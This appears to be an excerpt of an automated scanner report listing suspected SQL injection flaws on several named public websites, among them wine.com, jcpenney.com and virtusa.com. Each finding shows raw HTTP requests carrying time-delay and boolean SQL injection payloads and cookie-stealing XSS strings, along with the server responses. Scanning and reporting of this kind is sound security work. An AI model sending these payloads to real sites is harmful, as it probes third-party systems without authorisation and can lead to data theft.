<head>
<meta http-equiv="Content-
...[SNIP]...
1.150. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie&1')waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:41:33 GMT
Server: Microsoft-IIS/6.0
Content-Length: 4861
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=KKABGAJBEJFLHGKDIKIBCFOD; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Microsoft OLE DB Provider for SQL Server</font>
...[SNIP]...
1.151. http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vendorseek.com
Path:   /no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ,0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request

GET /no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4%22%3E%3Cscript%3Ealert(document.cookie&1,0,0,0)waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: www.vendorseek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:33:09 GMT
Server: Microsoft-IIS/6.0
Content-Length: 319
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQARDQACS=LLNAGAJBJIIBCAENBGEEIOFN; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80004005'</font>
<p>
<font face="Arial" size=2>Invalid connection string attribute</font
...[SNIP]...
1.152. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.virtusa.com
Path:   /applications/userlogin/userlogin.asp

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft Access.

Request

GET /applications'/userlogin/userlogin.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 344
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACTRQTBD=ACNJABCBDCJFGENDKPKPBPHM; path=/
X-Powered-By: ASP.NET
Date: Fri, 18 Mar 2011 19:23:50 GMT
Connection: close

<font face="Arial" size=2>
<p>Microsoft JET Database Engine</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Syntax error in string in query expression 'lcase(oldurl)='/applications'/userlogin/userlogin.asp''.</font>
...[SNIP]...
1.153. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.virtusa.com
Path:   /applications/userlogin/userlogin.asp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft Access.

Request

GET /applications/userlogin'/userlogin.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 344
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACTRQTBD=OKNJABCBAFFICICKLJCHKBNL; path=/
X-Powered-By: ASP.NET
Date: Fri, 18 Mar 2011 19:24:02 GMT
Connection: close

<font face="Arial" size=2>
<p>Microsoft JET Database Engine</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Syntax error in string in query expression 'lcase(oldurl)='/applications/userlogin'/userlogin.asp''.</font>
...[SNIP]...
1.154. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.virtusa.com
Path:   /applications/userlogin/userlogin.asp

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft Access.

Request

GET /applications/userlogin/userlogin.asp' HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 344
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDACTRQTBD=APNJABCBHONHGHPLABHBPNFC; path=/
X-Powered-By: ASP.NET
Date: Fri, 18 Mar 2011 19:24:14 GMT
Connection: close

<font face="Arial" size=2>
<p>Microsoft JET Database Engine</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>Syntax error in string in query expression 'lcase(oldurl)='/applications/userlogin/userlogin.asp'''.</font>
...[SNIP]...
1.155. http://www.wi-fihotspotlist.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wi-fihotspotlist.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?4100a--%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.wi-fihotspotlist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d1--%20
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:36:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:37:52 GMT
Connection: close
Content-Type: text/html
Content-Length: 62525

<html>
<head>
<title> Wi-FiHotSpotList.com, a directory of public hot spots for finding Wi-Fi
wireless Internet access network nodes</title>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661891/661881/661869/582072/581034;s=9555;x=7936;f=110921999;u=j;z=20110318123652" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661891/661881/661869/582072/581034;s=9555;x=7936;f=110921999;u=j;z=20110318123652" alt="Click here"></a>
</noscript>
</span>



<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_dn.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} #menulist_cust li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_login.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} .menulist ul li{ float:none; margin:0; margin-bottom:-1px; margin-top:-2px; color:#fff; filter:alpha(opacity=95); -moz-opacity:.05; opacity:.95; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px} .menulist ul li a:hover{ float:none; margin:0; background-color:#666; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px; color:#fff} .menulist a{ display:block; padding:3px; color:#fff; text-decoration:none; text-align:left} .menulist a:hover, .me
...[SNIP]...

Request 2

GET /?4100a--%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.wi-fihotspotlist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d2--%20
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:36:52 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:37:52 GMT
Connection: close
Content-Type: text/html
Content-Length: 62515

<html>
<head>
<title> Wi-FiHotSpotList.com, a directory of public hot spots for finding Wi-Fi
wireless Internet access network nodes</title>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=661891/661881/661869/582072/581034;s=9555;x=7936;f=678339395;u=j;z=20110318123652" target="_blank">
<img border="0" width="0" height="0" src="http://o1.qnsr.com/cgi/x?;n=203;c=661891/661881/661869/582072/581034;s=9555;x=7936;f=678339395;u=j;z=20110318123652" alt="Click here"></a>
</noscript>
</span>



<script type="text/javascript" src="/icom_includes/toolbars/globaltoolbar/scripts/globaltoolbar-js.js"></script>
<style type="text/css"> #navitoolbarcontainer a { line-height: 16px; } ::root menulist, .menulist ul{margin-top:-10px} .menulist, .menulist ul{margin:0; padding:0; list-style:none; font:9px arial; color:#fff; float:left; display:inline} .menulist a:visited{color:#fff; text-decoration:none} .menulist ul{ display:none; position:absolute; top:1.0em; margin-top:12px; left:-1px; width:180px; color:#fff} .menulist ul ul{ top:-1px; margin-top:0; left:148px; color:#fff; z-index:200} .menulist li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_dn.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} #menulist_cust li{ float:left; display:block; position:relative; background:#676767; border:1px solid #999; border-bottom:0px solid #999; border-top:0px solid #999; margin-right:-1px; background-image:url('/icom_includes/toolbars/globaltoolbar/img/background_login.gif'); background-repeat:repeat-x; line-height:15px; color:#fff} .menulist ul li{ float:none; margin:0; margin-bottom:-1px; margin-top:-2px; color:#fff; filter:alpha(opacity=95); -moz-opacity:.05; opacity:.95; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px} .menulist ul li a:hover{ float:none; margin:0; background-color:#666; color:#fff} .menulist ul>li:last-child{ margin-bottom:1px; color:#fff} .menulist a{ display:block; padding:3px; color:#fff; text-decoration:none; text-align:left} .menulist a:hover, .me
...[SNIP]...
1.156. http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3ef6545857e09 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3ef6545857e09

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 20472 milliseconds to respond to the request, compared with 257 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /v6'waitfor%20delay'0%3a0%3a20'--/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3ef6545857e09 HTTP/1.1
Host: www.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: ASPSESSIONIDAQSDRCTT=MFCEKNJBMKNEGDIOGCOECNLG; path=/
Set-Cookie: SL_Audience=822|Unaccelerated|209|1|0;Expires=Sun, 17-Mar-13 16:38:04 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=32446520.SL_TS_Unaccelerated;Expires=Sun, 17-Mar-13 16:38:04 GMT;Path=/;Domain=.wine.com
Cache-Control: private
Date: Fri, 18 Mar 2011 16:38:04 GMT
Connection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 1494


<html>
<head><script id="slheadjs" type="text/javascript" err="true">__$1D0C = { head: new Date()}</script>
   <title>Wine.com - Buy Wine, Wine Clubs, Gift Baskets and more</title>
   <meta name="ke
...[SNIP]...
1.157. http://www.wreg.com/tivid.html [playerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wreg.com
Path:   /tivid.html

Issue detail

The playerID parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the playerID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /tivid.html?itemId=&categoryId=299fda98-b8af-49c4-987a-09d58e40d6e650c4c%22;alert(document.cookie)//2b82136d3bf&playerID=88490040'%20and%201%3d1--%20&playerSize=large&layoutColumns=1&listType=horz&autoPlay=false HTTP/1.1
Host: www.wreg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8l mod_onsint/1.0
x-Instance-Name: i1s28z2n1
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Fri, 18 Mar 2011 16:37:39 GMT
Content-Length: 9247
Connection: close


<html>
<head>


</head>
<body style="margin:0px;">
<script src="/hive/javascripts/video-tool.js" type="text/javascript"></script>
   <script src="/hive/javascripts/AC_OETag
...[SNIP]...
=false";
           var layoutColumns = "&layoutColumns=1";
           var carouselType = "&carouselType=horz";
var titleAvailable = "&titleAvailable=true";
var autoPlay = "&autoPlayVideo=false";

           // -----------------------------------------------------------------------------
           // -->

               // write flash obj with query string
               function writeFlash() {

                   // assemble flash obj
                   var flashTags = '<noscript><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" id="'+playerName+'" align="middle" width="'+width+'" height="100%">';
                   flashTags = ''+flashTags+'<param name="allowScriptAccess" value="sameDomain" />';
                   flashTags = ''+flashTags+'<param name="allowFullScreen" value="true" />';
                   flashTags = ''+flashTags+'<param name="movie" value="'+playerName+'.swf" />';
                   flashTags = ''+flashTags+'<param name="quality" value="high" />';
                   flashTags = ''+flashTags+'<param name="salign" value="l" />';
                flashTags = ''+flashTags+'<param name="wmode" value="opaque" />';
                   flashTags = ''+flashTags+'<param name="bgcolor" value="#ffffff" />';
                   flashTags = ''+flashTags+'<param name="FlashVars" value="'+autoPlay+''+titleAvailable+'&omnitureServer='+omnitureServer+'&omAccount='+omnitureAccount+''+layoutColumns+''+carouselType+''+playerAvailable+''+searchAvailable+''+singleURL+''+multipleURL+'&'+adZone+'&'+adServ+'&'+randNum+'&'+propName+'&'+hostURL+'&swfPath='+swfPath+'" />';
                   flashTags = ''+flashTags+'<embed src="'+swfPath+''+playerName+'" width="'+width+'" wmode="transparent" allowScriptAccess="sameDomain" height="'+height+'" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" salign="l" bgcolor="#ffffff"></embed>';
                   flashTags = ''+flashTags+'</object></noscript>';

                   // write all lines
                   document.write(flashTags);


               }

               function loadVideoInfo(title, duration, published){
                var rePublish = published;
                rePublish = convertXmlTime(published);
                    document.getElementById('video-info').innerHTML = '<div id="video-title"><h1>' +title+
...[SNIP]...

Request 2

GET /tivid.html?itemId=&categoryId=299fda98-b8af-49c4-987a-09d58e40d6e650c4c%22;alert(document.cookie)//2b82136d3bf&playerID=88490040'%20and%201%3d2--%20&playerSize=large&layoutColumns=1&listType=horz&autoPlay=false HTTP/1.1
Host: www.wreg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8l mod_onsint/1.0
x-Instance-Name: i1s30z1n1
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=300
Date: Fri, 18 Mar 2011 16:37:39 GMT
Content-Length: 9269
Connection: close


<html>
<head>


</head>
<body style="margin:0px;">
<script src="/hive/javascripts/video-tool.js" type="text/javascript"></script>
   <script src="/hive/javascripts/AC_OETag
...[SNIP]...
=false";
           var layoutColumns = "&layoutColumns=1";
           var carouselType = "&carouselType=horz";
var titleAvailable = "&titleAvailable=true";
var autoPlay = "&autoPlayVideo=false80580964511441f749c896ba";

           // -----------------------------------------------------------------------------
           // -->

               // write flash obj with query string
               function writeFlash() {

                   // assemble flash obj
                   var flashTags = '<noscript><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" id="'+playerName+'" align="middle" width="'+width+'" height="100%">';
                   flashTags = ''+flashTags+'<param name="allowScriptAccess" value="sameDomain" />';
                   flashTags = ''+flashTags+'<param name="allowFullScreen" value="true" />';
                   flashTags = ''+flashTags+'<param name="movie" value="'+playerName+'.swf" />';
                   flashTags = ''+flashTags+'<param name="quality" value="high" />';
                   flashTags = ''+flashTags+'<param name="salign" value="l" />';
                flashTags = ''+flashTags+'<param name="wmode" value="opaque" />';
                   flashTags = ''+flashTags+'<param name="bgcolor" value="#ffffff" />';
                   flashTags = ''+flashTags+'<param name="FlashVars" value="'+autoPlay+''+titleAvailable+'&omnitureServer='+omnitureServer+'&omAccount='+omnitureAccount+''+layoutColumns+''+carouselType+''+playerAvailable+''+searchAvailable+''+singleURL+''+multipleURL+'&'+adZone+'&'+adServ+'&'+randNum+'&'+propName+'&'+hostURL+'&swfPath='+swfPath+'" />';
                   flashTags = ''+flashTags+'<embed src="'+swfPath+''+playerName+'" width="'+width+'" wmode="transparent" allowScriptAccess="sameDomain" height="'+height+'" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" salign="l" bgcolor="#ffffff"></embed>';
                   flashTags = ''+flashTags+'</object></noscript>';

                   // write all lines
                   document.write(flashTags);


               }

               function loadVideoInfo(title, duration, published){
                var rePublish = published;
                rePublish = convertXmlTime(published);
                    document.getElementById('video-info').innerHTML = '<div id="vi
...[SNIP]...
1.158. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.wwmt.com
Path:   /articles/calls-1387029-mubarak-friend.html97f15'

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /articles/calls-1387029-mubarak-friend.html97f15';alert(document.cookie HTTP/1.1
Host: www.wwmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d1--%20
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:40:37 GMT
Server: Apache
Cache-Control: no-store, no-cache, max-age=600
Pragma: no-cache
Expires: Fri, 18 Mar 2011 16:50:37 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 88473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:pas="
...[SNIP]...
<div id="pluck_comments_69754" class="pluck-app pluck-comm" style="display:none;" onpage="1" itemsperpage="10" sort="TimeStampAscending" filter="" commentOnKey="Articlewwmt1387029" commentOnKeyType="article" pagerefresh="false" listtype="full">
   
<div id="pluck_user_miniPersona_dialog_88367" class="pluck-user-mp-dialog" >
   <div class="pluck-user-mp-qtip-style" style="display:none;"></div>
   <div class="pluck-user-mp-wrap">
       <div class="pluck-user-mp-sidebar">
           <div class="pluck-user-mp-avatar-seethrough">
               <a href="#"><img alt="" class="pluck-user-mp-avatarimg" /></a>
           </div>

       </div>
       <div class="pluck-user-mp-wait">
           <div class="pluck-user-mp-wait-modal">&nbsp;</div>
           <div class="pluck-user-mp-wait-msg"><img src="http://sitelife.wwmt.com/ver1.0/Content/ua/images/throbber.gif"/><br/>Please wait while we process your request</div>
       </div>
       <div class="pluck-user-mp-loading">
           <div class="pluck-user-mp-loading-modal">&nbsp;</div>
           <div class="pluck-user-mp-loading-msg"><img src="http://sitelife.wwmt.com/ver1.0/Content/ua/images/throbber.gif"/><br/>Please wait while we retrieve the user's information</div>
       </div>
       <div class="pluck-user-mp-content">
           <h4 class="pluck-user-mp-username"><a href="#"><span class="pluck-user-mp-username-value"></span></a></h4>
           <p class="pluck-user-mp-asl"></p>
           <div class="pluck-user-mp-activity-area">
               <p class="pluck-user-mp-info"><span class="pluck-user-mp-sub-head">Bio</span><span class="pluck-user-mp-text pluck-user-mp-bio"></span></p>
               <p class="pluck-user-mp-info"><span class="pluck-user-mp-no-bio">Your bio is currently empty. Now is a great time to <a href="#">fill in your profile</a>.</span></p>

               <p class="pluck-user-mp-private-info">This profile is private.</p>

               <p class="pluck-user-mp-sharedWithFriends-info">This profile is only shared with friends.</p>

               <p class="pluck-user-mp-abusive-info">This profile is under review.</p>
               <p class="pluck-error-message pluck-user-mp-err
...[SNIP]...

Request 2

GET /articles/calls-1387029-mubarak-friend.html97f15';alert(document.cookie HTTP/1.1
Host: www.wwmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d2--%20
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:40:40 GMT
Server: Apache
Cache-Control: no-store, no-cache, max-age=600
Pragma: no-cache
Expires: Fri, 18 Mar 2011 16:50:40 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 88462

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:pas="
...[SNIP]...
<div id="pluck_comments_95408" class="pluck-app pluck-comm" style="display:none;" onpage="1" itemsperpage="10" sort="TimeStampAscending" filter="" commentOnKey="Articlewwmt1387029" commentOnKeyType="article" pagerefresh="false" listtype="full">
   
<div id="pluck_user_miniPersona_dialog_42771" class="pluck-user-mp-dialog" >
   <div class="pluck-user-mp-qtip-style" style="display:none;"></div>
   <div class="pluck-user-mp-wrap">
       <div class="pluck-user-mp-sidebar">
           <div class="pluck-user-mp-avatar-seethrough">
               <a href="#"><img alt="" class="pluck-user-mp-avatarimg" /></a>
           </div>

       </div>
       <div class="pluck-user-mp-wait">
           <div class="pluck-user-mp-wait-modal">&nbsp;</div>
           <div class="pluck-user-mp-wait-msg"><img src="http://sitelife.wwmt.com/ver1.0/Content/ua/images/throbber.gif"/><br/>Please wait while we process your request</div>
       </div>
       <div class="pluck-user-mp-loading">
           <div class="pluck-user-mp-loading-modal">&nbsp;</div>
           <div class="pluck-user-mp-loading-msg"><img src="http://sitelife.wwmt.com/ver1.0/Content/ua/images/throbber.gif"/><br/>Please wait while we retrieve the user's information</div>
       </div>
       <div class="pluck-user-mp-content">
           <h4 class="pluck-user-mp-username"><a href="#"><span class="pluck-user-mp-username-value"></span></a></h4>
           <p class="pluck-user-mp-asl"></p>
           <div class="pluck-user-mp-activity-area">
               <p class="pluck-user-mp-info"><span class="pluck-user-mp-sub-head">Bio</span><span class="pluck-user-mp-text pluck-user-mp-bio"></span></p>
               <p class="pluck-user-mp-info"><span class="pluck-user-mp-no-bio">Your bio is currently empty. Now is a great time to <a href="#">fill in your profile</a>.</span></p>

               <p class="pluck-user-mp-private-info">This profile is private.</p>

               <p class="pluck-user-mp-sharedWithFriends-info">This profile is only shared with friends.</p>

               <p class="pluck-user-mp-abusive-info">This profile is under review.</p>
               <p class="pluck-error-message pluck-user-mp-err
...[SNIP]...
1.159. http://www4.jcpenney.com/jcp/XGN.aspx [pcat parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www4.jcpenney.com
Path:   /jcp/XGN.aspx

Issue detail

The pcat parameter appears to be vulnerable to SQL injection attacks. The payloads 39333395'%20or%201%3d1--%20 and 39333395'%20or%201%3d2--%20 were each submitted in the pcat parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /jcp/XGN.aspx?n=4294953363&catsel=4294953363--comforters+++bedspreads&deptid=70750&pcatid=70750&catid=72384&cattyp=SAL&dep=BEDDING&pcat=BEDDING39333395'%20or%201%3d1--%20&cat=Sale&refpagename=Default%252Easpx&refdeptid=&refcatid=&cmAMS_T=T1&cmAMS_C=C3&CmCatId=homepage&l=1 HTTP/1.1
Host: www4.jcpenney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC"
Content-Type: text/html; charset=utf-8
ntCoent-Length: 332674
Cache-Control: private, max-age=1200
Expires: Fri, 18 Mar 2011 17:10:44 GMT
Date: Fri, 18 Mar 2011 16:50:44 GMT
Connection: close
Connection: Transfer-Encoding
